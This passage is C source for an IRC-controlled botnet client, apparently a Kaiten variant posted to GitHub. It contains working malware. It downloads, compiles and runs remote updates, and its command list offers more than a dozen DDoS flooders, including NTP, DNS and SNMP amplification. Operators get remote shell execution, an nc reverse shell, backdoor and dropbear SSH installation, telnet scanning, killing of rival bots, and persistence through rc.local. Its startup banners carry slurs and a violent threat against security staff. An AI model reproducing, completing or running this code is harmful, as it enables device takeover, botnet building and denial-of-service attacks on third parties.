Send(sock, "NOTICE %s :Unable to create socket (Wierd, you shouldnt get this error and ITS NOT MY FAULT!).\n", sender);
exit(0);
}
server.sin_family = AF_INET;
server.sin_port = htons(80);
if ((ipaddr = inet_addr(argv[1])) == -1) {
struct hostent *hostm;
if ((hostm=gethostbyname(argv[1])) == NULL) {
Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);
exit(0);
}
memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
}
else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);
exit(0);
}
gcc=popen("gcc --help","r");
if (gcc != NULL) {
memset(buf,0,1024);
fgets(buf,1024,gcc);
if (!strstr(buf,"Usage")) dgcc=0;
else dgcc=1;
pclose(gcc);
} else dgcc=0;
for (i=0;i<strlen(argv[2]) && argv[2][i] != ':';i++);
argv[2][i]=0;
if (dgcc) file=argv[2];
else file=argv[2]+i+1;
Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",file,argv[1]);
Send(sock, "NOTICE %s :Receiving update.\n", sender);
system("mkdir /tmp");
if (dgcc) {
FILE *file=fopen("/tmp/.c","wb");
char bufm[4096];
while(1) {
int i;
if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
if (i < 4096) bufm[i]=0;
for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
for (d+=4;d<i;d++) fputc(bufm[d],file);
goto done;
}
}
done:
while(1) {
int i;
if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
if (i < 4096) bufm[i]=0;
for (d=0;d<i;d++) fputc(bufm[d],file);
}
fclose(file);
memset(buf,0,4096);
sprintf(buf,"(gcc -o %s /tmp/.c; rm -rf /tmp/.c; kill -9 %d; %s &) > /dev/null 2>&1",execfile,parent,execfile);
}
else {
FILE *file=fopen("/tmp/.o","wb");
unsigned char bufm[4096];
while(1) {
int i;
if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
if (i < 4096) bufm[i]=0;
for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
for (d+=4;d<i;d++) fputc(bufm[d],file);
goto done2;
}
}
done2:
while(1) {
int i,d;
if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
if (i < 4096) bufm[i]=0;
for (d=0;d<i;d++) fputc(bufm[d],file);
}
fclose(file);
memset(buf,0,4096);
//sprintf(buf,"(chmod 755 /tmp/.o;kill -9 %d; kill -9 %d;trap '' 1 2; /tmp/.o &) > /dev/null",actualparent,parent,execfile);
//sprintf(buf,"chmod +x /tmp/.o; trap '' 1;sh -c '/var/bin/killall knight*;/var/bin/killall .o;sleep 5;trap \"\" 1;/tmp/.o '&");
sprintf(buf,"export PATH=/usr/sbin:/bin:/usr/bin:/sbin:/var/bin;chmod +x /tmp/.o; trap '' 1;sh -c '/var/bin/killall knight*;/var/bin/killall kt*;/var/bin/killall .o;/var/bin/sleep 5;trap "" 1;/tmp/.o '&");
}
close(sock);
close(sock2);
system(buf);
kill(9,0);
exit(0);
}
void move(int sock, char *sender, int argc, char **argv) {
if (argc < 1) {
Send(sock, "NOTICE %s :MOVE <server>\n", sender);
exit(1);
}
server=strdup(argv[1]);
changeservers=1;
close(sock);
}
void hackpkg(int sock, char *sender, int argc, char **argv) {
int sock2,i,d;
struct sockaddr_in server;
unsigned long ipaddr;
char buf[1024];
FILE *file;
mkdir("/var/bin", 0775);
unsigned char bufm[4096];
if (mfork(sender) != 0) return;
if (argc < 2) {
Send(sock, "NOTICE %s :HACKPGK <url> <binary name>\n", sender);
exit(0);
}
if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
Send(sock, "NOTICE %s :Unable to create socket.\n", sender);
exit(0);
}
if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
else strcpy(buf,argv[1]);
for (i=0;i<strlen(buf) && buf[i] != '/';i++);
buf[i]=0;
server.sin_family = AF_INET;
server.sin_port = htons(80);
if ((ipaddr = inet_addr(buf)) == -1) {
struct hostent *hostm;
if ((hostm=gethostbyname(buf)) == NULL) {
Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);
exit(0);
}
memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
}
else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);
exit(0);
}
Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: HackZilla/1.67 [en] (X11; U; Linux 2.2.16-3 x64)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
Send(sock, "NOTICE %s :Receiving file.\n", sender);
file=fopen(argv[2],"wb");
while(1) {
int i;
if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
if (i < 4096) bufm[i]=0;
for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
for (d+=4;d<i;d++) fputc(bufm[d],file);
goto done;
}
}
done:
Send(sock, "NOTICE %s :Installed %s to hack path.\n", sender,argv[2]);
while(1) {
int i,d;
if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
if (i < 4096) bufm[i]=0;
for (d=0;d<i;d++) fputc(bufm[d],file);
}
fclose(file);
close(sock2);
char MoveIt[255];
sprintf(MoveIt, "cat %s > /var/bin/%s",argv[2],argv[2]);
system(MoveIt);
char DeleteIt[255];
sprintf(DeleteIt, "rm %s",argv[2],argv[2]);
system(DeleteIt);
char String[255];
sprintf(String, "chmod 775 /var/bin/%s",argv[2]);
system(String);
char String2[255];
sprintf(String2, "ls -l /var/bin/%s",argv[2]);
system(String2);
exit(0);
}
void help(int sock, char *sender, int argc, char **argv) {
if (mfork(sender) != 0) return;
Send(sock, "NOTICE %s :Non-root/spoof DDoS commands commands:\n", sender); sleep(5);
Send(sock, "NOTICE %s :STD <ip> <port> <time> = A non spoof HIV STD flooder\n", sender); sleep(1);
Send(sock, "NOTICE %s :HOLD <host> <port> <time> = A vanilla TCP connect flooder\n", sender); sleep(1);
Send(sock, "NOTICE %s :JUNK <host> <port> <time> = A vanilla TCP flooder (modded)\n", sender); sleep(1);
Send(sock, "NOTICE %s :UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = An advanced non spoof UDP flooder modified by Bit-Dealer\n", sender); sleep(1);
Send(sock, "NOTICE %s :HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder added by Bit-Dealer\n", sender); sleep(1);
Send(sock, "NOTICE %s :WGETFLOOD <url> <secs> = An HTTP(S) flooder\n", sender); sleep(1);
Send(sock, "NOTICE %s :Spoof/root commands:\n", sender); sleep(5);
Send(sock, "NOTICE %s :UDP <target> <port> <secs> = A UDP flooder\n", sender); sleep(1);
Send(sock, "NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers\n", sender); sleep(1);
Send(sock, "NOTICE %s :TCP <target> <port> <time> <flags> <packetsize> <pollinterval> <threads> = An advanced TCP flooder with multithreading added by Bit-Dealer. Will kill almost any service.\n", sender); sleep(1);
Send(sock, "NOTICE %s :PHATWONK <target> <flags/method> <secs> = A leet flooder coded by Bit-Dealer, attacks 31 ports. Can set flags or attack method.\n", sender); sleep(1);
Send(sock, "NOTICE %s :BLACKNURSE <target ip> <secs> = An ICMP packet flooder that will crash most firewalls. added by Bit-Dealer\n", sender); sleep(1);
Send(sock, "NOTICE %s :SOCKSTRESS <ip>:<port> <interface> -s <time> [-p payload] [-d delay]\n", sender); sleep(1);
Send(sock, "NOTICE %s :TARGA3 <ip1> [ip2] ... [-s seconds] = Targa3 attack added by Bit-Dealer. TCP stack fuzzer. Can attack up to 200 hosts at once. Will bypass most filters and crash old machines.\n", sender); sleep(1);
Send(sock, "NOTICE %s :NTP <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = A NTP DrDoS flooder added by Bit-Dealer. Very potent.\n", sender); sleep(1);
Send(sock, "NOTICE %s :DNS <IP> <port> <reflection file url> <threads> <time> = A DNS DrDoS flooder added by Bit-Dealer. Almost unblockable.\n", sender); sleep(1);
Send(sock, "NOTICE %s :QUAKE3 <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = A DrDoS flooder that uses the Quake3 protocol. Nearly as powerful as NTP, harder to block.\n", sender); sleep(1);
Send(sock, "NOTICE %s :SNMP <IP> <port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = SNMP DrDoS flooder. Insane amp factor (600 - 1700x)\n", sender); sleep(1);
Send(sock, "NOTICE %s :Misc commands:\n", sender); sleep(5);
Send(sock, "NOTICE %s :NICK <nick> = Changes the nick of the client\n", sender); sleep(1);
Send(sock, "NOTICE %s :SERVER <server> = Changes servers\n", sender); sleep(1);
Send(sock, "NOTICE %s :GETSPOOFS = Gets the current spoofing\n", sender); sleep(1);
Send(sock, "NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet\n", sender); sleep(1);
Send(sock, "NOTICE %s :DISABLE = Disables all packeting from this client\n", sender); sleep(1);
Send(sock, "NOTICE %s :ENABLE = Enables all packeting from this client\n", sender); sleep(1);
Send(sock, "NOTICE %s :BOTKILL = Runs the botkiller again (runs once bot is started)\n", sender); sleep(1);
Send(sock, "NOTICE %s :KILL = Kills the knight\n", sender); sleep(1);
Send(sock, "NOTICE %s :DNS2IP <domain>\n", sender); sleep(1);
Send(sock, "NOTICE %s :IP2DNS <ip> <open port>\n", sender);
Send(sock, "NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n", sender); sleep(1);
Send(sock, "NOTICE %s :UPDATE <http address> <src:bin> = Update this bot\n", sender); sleep(1);
Send(sock, "NOTICE %s :HACKPKG <http address> <bin name> = HackPkg is here! Install a bin, using http, no depends!\n", sender); sleep(1);
Send(sock, "NOTICE %s :VERSION = Requests version of client\n", sender); sleep(1);
Send(sock, "NOTICE %s :KILLALL = Kills all current packeting\n", sender); sleep(1);
Send(sock, "NOTICE %s :HELP = Displays this\n", sender); sleep(1);
Send(sock, "NOTICE %s :IRC <command> = Sends this command to the server\n", sender); sleep(1);
Send(sock, "NOTICE %s :SH <command> = Executes a command\n", sender); sleep(1);
Send(sock, "NOTICE %s :ISH <command> = SH, interactive, sends to channel\n", sender); sleep(1);
Send(sock, "NOTICE %s :SHD <command> = Executes a psuedo-daemonized command\n", sender); sleep(1);
Send(sock, "NOTICE %s :GETBB <tftp server> = Get a proper busybox\n", sender); sleep(1);
Send(sock, "NOTICE %s :INSTALL <http server/file_name> = Download & install a binary to /var/bin \n", sender); sleep(1);
Send(sock, "NOTICE %s :BASH <cmd> = Execute commands using bash. \n", sender); sleep(1);
Send(sock, "NOTICE %s :BINUPDATE <http:server/package> = Update a binary in /var/bin via wget \n", sender); sleep(1);
Send(sock, "NOTICE %s :SCAN <nmap options> = Call the nmap wrapper script and scan with your opts. \n", sender); sleep(1);
Send(sock, "NOTICE %s :RSHELL <server> <port> = Equates to nohup nc ip port -e /bin/sh\n", sender); sleep(1);
Send(sock, "NOTICE %s :LOCKUP <http:server> = Kill telnet, d/l aes backdoor from <server>, run that instead.\n", sender); sleep(1);
Send(sock, "NOTICE %s :GETSSH <http:server/dropbearmulti> = D/l, install, configure and start dropbear on port 30022.\n", sender); sleep(1);
exit(0);
}
void killall(int sock, char *sender, int argc, char **argv) {
unsigned long i;
for (i=0;i<numpids;i++) {
if (pids[i] != 0 && pids[i] != getpid()) {
if (sender) Send(sock, "NOTICE %s :Killing pid %d.\n", sender,pids[i]);
kill(pids[i],9);
}
}
}
void killd(int sock, char *sender, int argc, char **argv) {
char buf[1024]={0};
if (disabled == 1) return;
sprintf(buf,"kill -9 %d;kill -9 0",actualparent);
system(buf);
exit(0);
}
struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
{ "STD", sendSTD },
{ "UNKNOWN", unknown },
{ "HTTP", HTTP },
{ "WGETFLOOD", wgetHTTP },
{ "HOLD", hold },
{ "JUNK", junk },
{ "PAN", pan },
{ "UDP", udp },
{ "TCP", tcpflood },
{ "PHATWONK", phatwonk },
{ "NTP", ntp },
{ "SNMP", snmp },
{ "DNS", dns },
{ "QUAKE3", quake3 },
{ "BLACKNURSE", blacknurse },
{ "SOCKSTRESS", sockstress },
{ "TARGA3", targa3 },
{ "SCANNER", doScanner },
{ "GETIP", getip },
{ "DNS2IP", dns2ip },
{ "IP2DNS", ip2dns },
// { "PROXYFLUX", proxyflux },
{ "BOTKILL", cleanDevice },
{ "NICK", nickc },
{ "SERVER", move },
{ "GETSPOOFS", getspoofs },
{ "SPOOFS", spoof },
{ "HACKPKG", hackpkg },
{ "DISABLE", disable },
{ "ENABLE", enable },
{ "UPDATE", update },
{ "KILL", killd },
{ "GET", get },
{ "VERSION", version },
{ "KILLALL", killall },
{ "HELP", help },
{ (char *)0, (void (*)(int,char *,int,char **))0 } };
void _PRIVMSG(int sock, char *sender, char *str) {
int i;
char *to, *message;
for (i=0;i<strlen(str) && str[i] != ' ';i++);
str[i]=0;
to=str;
message=str+i+2;
for (i=0;i<strlen(sender) && sender[i] != '!';i++);
sender[i]=0;
if (*message == '!' && !strcasecmp(to,chan)) {
char *params[12], name[1024]={0};
int num_params=0, m;
message++;
for (i=0;i<strlen(message) && message[i] != ' ';i++);
message[i]=0;
if (strwildmatch(message,nick)) return;
message+=i+1;
if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock, "NOTICE %s :Unable to comply.\n", sender); else Send(sock, "%s\n",message+4);
if (!strncmp(message,"SH ",3)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf,0,1024);
sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3);
command=popen(buf,"r");
while(!feof(command)) {
memset(buf,0,1024);
fgets(buf,1024,command);
Send(sock, "NOTICE %s :%s\n", sender,buf);
sleep(1);
}
pclose(command);
exit(0);
}
// SHD (daemonize sh command)
if (!strncmp(message,"SHD ",4)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf,0,1024);
sprintf(buf,"export HOME=/tmp;export;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;trap '' 1 2; sh -c '%s'&",message+4);
command=popen(buf,"r");
while(!feof(command)) {
memset(buf,0,1024);
fgets(buf,1024,command);
Send(sock, "NOTICE %s :%s\n", sender,buf);
sleep(1);
}
pclose(command);
exit(0);
}
// GETBB (this installs a better busybox, via tftp. This func, like the rest, has a dependency that we would like eliminate (in this case tftp). We really want to have the c program handle as much of thse custom funcs as possile. I am not graet with c, but proficient with linux, so i added these.
if (!strncmp(message,"GETBB ",6)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf,0,1024);
sprintf(buf,"export fileGet=busybox-mips;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;cd /var;(([ ! -e /var/\"$fileGet\" ] || [ ! -s /var/\"$fileGet\" ]) && tftp -g -r \"$fileGet\" %s && chmod +x \"$fileGet\" && ./\"$fileGet\" mkdir bin && ./\"$fileGet\" --install -s /var/bin && ls -l \"$fileGet\" || echo It appears we already have /var/\"$fileGet\")",message+6);
command=popen(buf,"r");
while(!feof(command)) {
memset(buf,0,1024);
fgets(buf,1024,command);
Send(sock, "NOTICE %s :%s\n", sender,buf);
sleep(1);
}
pclose(command);
exit(0);
}
// GETSSH (download, install, start dropbear, requires busybox for wget, mv, somet other things that are not always present on embedded devices
if (!strncmp(message,"GETSSH ",7)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf,0,1024);
sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;cd /tmp;export url=%s;name=`echo \"$url\" | sed 's#.\x2a/##'` && wget -O \"$name\" \"$url\";chmod +x \"$name\";mv \"$name\" /var/bin;ls -l /var/bin/\"$name\" && dss=/var/dbs/dropbear_dss_host_key;rsa=/var/dbs/dropbear_rsa_host_key;ecd=/var/dbs/dropbear_ecdsa_host_key;cd /var/bin;for i in dropbear dbclient dropbearkey dropbearconvert;do ln -s /var/bin/dropbearmulti $i;done;[ ! -d /var/dbs ] && mkdir /var/dbs;[ -f $dss ] || dropbearkey -t dss -f $dss;[ -f $rsa ] || dropbearkey -t rsa -f $rsa;[ -f $ecd ] || dropbearkey -t ecdsa -f $ecd;dropbear -r $dss -r $rsa -r $ecd -p 30022;iptables -I INPUT 1 -p tcp --dport 30022 -j ACCEPT",message+7);
command=popen(buf,"r");
while(!feof(command)) {
memset(buf,0,1024);
fgets(buf,1024,command);
Send(sock, "NOTICE %s :%s\n", sender,buf);
sleep(1);
}
pclose(command);
exit(0);
}
// INSTALL (uses wget to download and install a file into our hack path. This program already has a built in http func, so it would be great to use taht instead of needing to download busybox/wget first
if (!strncmp(message,"INSTALL ",8)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf,0,1024);
sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | sed 's#.\x2a/##'`;(([ ! -e /var/bin/$name ] || [ ! -s /var/bin/$name ]) && echo \"$name either doesnt exist or eq 0 so we get\" && cd /tmp && wget -O \"$name\" \"$url\" && chmod +x \"$name\" && mv \"$name\" /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo \"It appears I already have $name\")",message+8);
command=popen(buf,"r");
while(!feof(command)) {
memset(buf,0,1024);
fgets(buf,1024,command);
Send(sock, "NOTICE %s :%s\n", sender,buf);
sleep(1);
}
pclose(command);
exit(0);
}
// BINUPDATE http://server/file (like install, but updates the program)
if (!strncmp(message,"BINUPDATE ",10)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf,0,1024);
sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | sed 's#.*/##'`;([ -e /var/bin/$name ]) && echo $name exists so we delete it... && rm /var/bin/$name && cd /tmp && wget -O $name $url && chmod +x $name && mv $name /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo \"$name doesnt exist, perhaps you mean INSTALL?\"",message+10);
command=popen(buf,"r");
while(!feof(command)) {
memset(buf,0,1024);
fgets(buf,1024,command);
Send(sock, "NOTICE %s :%s\n", sender,buf);
sleep(1);
}
pclose(command);
exit(0);
}
// LOCKUP <http:server/backdoor> (This kills telnet and installs my backdoor binary, which is aes encrypted. This is prob something else that would be cool to have built in to elimiate the dependency
if (!strncmp(message,"LOCKUP ",7)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf,0,1024);
sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;export HOME=/tmp;[ ! -f /var/bin/dmips ] && cd /var/bin;wget -O dmips %s;chmod +x /var/bin/dmips;(killall -9 telnetd || kill -9 telnetd) && (nohup dmips || trap '' 1 2 /var/bin/dmips)",message+7);
command=popen(buf,"r");
while(!feof(command)) {
memset(buf,0,1024);
fgets(buf,1024,command);
Send(sock, "NOTICE %s :%s\n", sender,buf);
sleep(1);
}
pclose(command);
exit(0);
}
// !* RSHELL server.com 4444 (reverse shell via nc. We need a built in reverese shell functiomn to eliminiate taht dependency
if (!strncmp(message,"RSHELL ",6)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf,0,1024);
sprintf(buf,"export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;trap '' 1 2; sh -c 'nohup nc %s -e /bin/sh '&",message+6);
command=popen(buf,"r");
while(!feof(command)) {
memset(buf,0,1024);
fgets(buf,1024,command);
Send(sock, "NOTICE %s :%s\n", sender,buf);
sleep(1);
}
pclose(command);
exit(0);
}
//SCAN (calls a wrapper script. We need a built in port scanner that auto uploads the results to a server
if (!strncmp(message,"SCAN ",5)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf,0,1024);
sprintf(buf,"export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;(([ ! -x /var/bin/scan ] || [ ! -x /var/bin/nmap ]) && echo \"I am missing either scan or nmap, and Shellzrus was on Xanax when he wrote this, so you need to do INSTALL http:\x2f\server/nmap and INSTALL http:\x2f\x2fserver/scan first...\" && ([ -f /var/bin/nmap ] && ls -l /var/bin/nmap) && ([ -f /va\x72/bin/scan ] && ls -l /var/bin/scan) || scan %s)",message+5);
command=popen(buf,"r");
while(!feof(command)) {
memset(buf,0,1024);
fgets(buf,1024,command);
Send(sock, "NOTICE %s :%s\n", sender,buf);
sleep(1);
}
pclose(command);
exit(0);
}
// !* BASH echo hello
if (!strncmp(message,"BASH ",5)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf,0,1024);
sprintf(buf,"export HOME=/tmp;export SHELL=/var/bin/bash;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;%s",message+5);
command=popen(buf,"r");
while(!feof(command)) {
memset(buf,0,1024);
fgets(buf,1024,command);
Send(sock, "NOTICE %s :%s\n", sender,buf);
sleep(1);
}
pclose(command);
exit(0);
}
m=strlen(message);
for (i=0;i<m;i++) {
if (*message == ' ' || *message == 0) break;
name[i]=*message;
message++;
}
for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
num_params++;
if (num_params > 10) num_params=10;
params[0]=name;
params[num_params+1]="\0";
m=1;
while (*message != 0) {
message++;
if (m >= num_params) break;
for (i=0;i<strlen(message) && message[i] != ' ';i++);
params[m]=(char*)malloc(i+1);
strncpy(params[m],message,i);
params[m][i]=0;
m++;
message+=i;
}
for (m=0; flooders[m].cmd != (char *)0; m++) {
if (!strcasecmp(flooders[m].cmd,name)) {
flooders[m].func(sock, sender,num_params-1,params);
for (i=1;i<num_params;i++) free(params[i]);
return;
}
}
}
}
void _376(int sock, char *sender, char *str) {
Send(sock, "MODE %s -xi\n",nick);
Send(sock, "JOIN %s :%s\n",chan,key);
Send(sock, "WHO %s\n",nick);
}
void _PING(int sock, char *sender, char *str) {
Send(sock, "PONG %s\n",str);
if(scanPid == 0) {
dickScanner(sock);
if(scanPid != 0) {
Send(sock, "PRIVMSG %s :[TELNET] [+] SCANNER STARTED!\n", chan); //Scanner has been started successfully!!!
}
}
}
void _352(int sock, char *sender, char *str) {
int i,d;
char *msg=str;
struct hostent *hostm;
unsigned long m;
for (i=0,d=0;d<5;d++) {
for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
if (i == strlen(str)) return;
}
for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
msg[i]=0;
if (!strcasecmp(msg,nick) && !spoofsm) {
msg=str;
for (i=0,d=0;d<3;d++) {
for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
if (i == strlen(str)) return;
}
for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
msg[i]=0;
if ((m = inet_addr(msg)) == -1) {
if ((hostm=gethostbyname(msg)) == NULL) {
Send(sock, "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
return;
}
memcpy((char*)&m, hostm->h_addr, hostm->h_length);
}
((char*)&spoofs)[3]=((char*)&m)[0];
((char*)&spoofs)[2]=((char*)&m)[1];
((char*)&spoofs)[1]=((char*)&m)[2];
((char*)&spoofs)[0]=0;
spoofsm=256;
}
}
void _433(int sock, char *sender, char *str) {
free(nick);
nick=randstring(realrand(4, 8));
}
void _NICK(int sock, char *sender, char *str) {
int i;
for (i=0;i<strlen(sender) && sender[i] != '!';i++);
sender[i]=0;
if (!strcasecmp(sender,nick)) {
if (*str == ':') str++;
if (nick) free(nick);
nick=randstring(realrand(4, 8));;
}
}
struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
{ "352", _352 },
{ "376", _376 },
{ "433", _433 },
{ "422", _376 },
{ "PRIVMSG", _PRIVMSG },
{ "PING", _PING },
{ "NICK", _NICK },
{ (char *)0, (void (*)(int,char *,char *))0 } };
void con() {
struct sockaddr_in srv;
unsigned long ipaddr,start;
int flag;
struct hostent *hp;
start:
sock=-1;
flag=1;
if (changeservers == 0) server=servers[rand()%numservers];
changeservers=0;
while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
if (inet_addr(server) == 0 || inet_addr(server) == -1) {
if ((hp = gethostbyname(server)) == NULL) {
server=NULL;
close(sock);
goto start;
}
bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
}
else srv.sin_addr.s_addr=inet_addr(server);
srv.sin_family = AF_INET;
srv.sin_port = htons(6667);
ioctl(sock,FIONBIO,&flag);
start=time(NULL);
while(time(NULL)-start < 10) {
errno=0;
if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
return;
}
if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
sleep(1);
}
server=NULL;
close(sock);
goto start;
}
int main(int argc, char **argv) {
printf("SUPER MOTHERFUCKING KAITEN WORMY BY Bit. PRAISE KEK. NULLZSEC ROX!!!\n");
printf("Capsiacin kaiten variant coded (and wormified) by Bit-Dealer aka Bit-Dealer\n");
printf("17 DDoS methods nigga! And for the netsec teams and feds reading this we will null all of your honeypots and slit your throats!!!\n");
int on,i;
char cwd[256],*str;
FILE *file;
botkill();
strcpy(dispass, "BitIsGod!!!");
#ifdef STARTUP
str="/etc/rc.d/rc.local";
file=fopen(str,"r");
if (file == NULL) {
str="/etc/rc.conf";
file=fopen(str,"r");
}
if (file != NULL) {
char outfile[256], buf[1024];
int i=strlen(argv[0]), d=0;
getcwd(cwd,256);
if (strcmp(cwd,"/")) {
while(argv[0][i] != '/') i--;
sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
while(!feof(file)) {
fgets(buf,1024,file);
if (!strcasecmp(buf,outfile)) d++;
}
if (d == 0) {
FILE *out;
fclose(file);
out=fopen(str,"a");
if (out != NULL) {
fputs(outfile,out);
fclose(out);
}
}
else fclose(file);
}
else fclose(file);
}
#endif
if (fork()) exit(0);
#ifdef FAKENAME
strncpy(argv[0],FAKENAME,strlen(argv[0]));
for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
#endif
srand((time(NULL) ^ getpid()) + getppid());
nick=randstring(realrand(4, 8));
ident=randstring(realrand(4, 8));
user=randstring(realrand(4, 8));
chan=CHAN;
key=KEY;
server=NULL;
sa:
#ifdef IDENT
for (i=0;i<numpids;i++) {
if (pids[i] != 0 && pids[i] != getpid()) {
kill(pids[i],9);
waitpid(pids[i],NULL,WNOHANG);
}
}
pids=NULL;
numpids=0;
identd();
#endif
con();
Send(sock, "NICK %s|%s|%s\nUSER %s localhost localhost :%s\n", PREFIX, getBuild(), nick, user, ident);
while(1) {
unsigned long i;
fd_set n;
struct timeval tv;
FD_ZERO(&n);
FD_SET(sock,&n);
tv.tv_sec=60*20;
tv.tv_usec=0;
if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
unsigned int *newpids,on;
for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
pids[on-1]=0;
numpids--;
newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
for (on=0;on<numpids;on++) newpids[on]=pids[on];
free(pids);
pids=newpids;
}
if (FD_ISSET(sock,&n)) {
char buf[4096], *str;
int i;
if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
buf[i]=0;
str=strtok(buf,"\n");
while(str && *str) {
char name[1024], sender[1024];
filter(str);
if (*str == ':') {
for (i=0;i<strlen(str) && str[i] != ' ';i++);
str[i]=0;
strcpy(sender,str+1);
strcpy(str,str+i+1);
}
else strcpy(sender,"*");
for (i=0;i<strlen(str) && str[i] != ' ';i++);
str[i]=0;
strcpy(name,str);
strcpy(str,str+i+1);
for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock, sender,str);
if (!strcasecmp(name,"ERROR")) {
if(scanPid != 0) { // Is the scanner running?
kill(scanPid, 9); // Kill the knights scanner if we get disconnected
}
goto sa; // Start connection routine
}
str=strtok((char*)NULL,"\n");
}
}
}
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment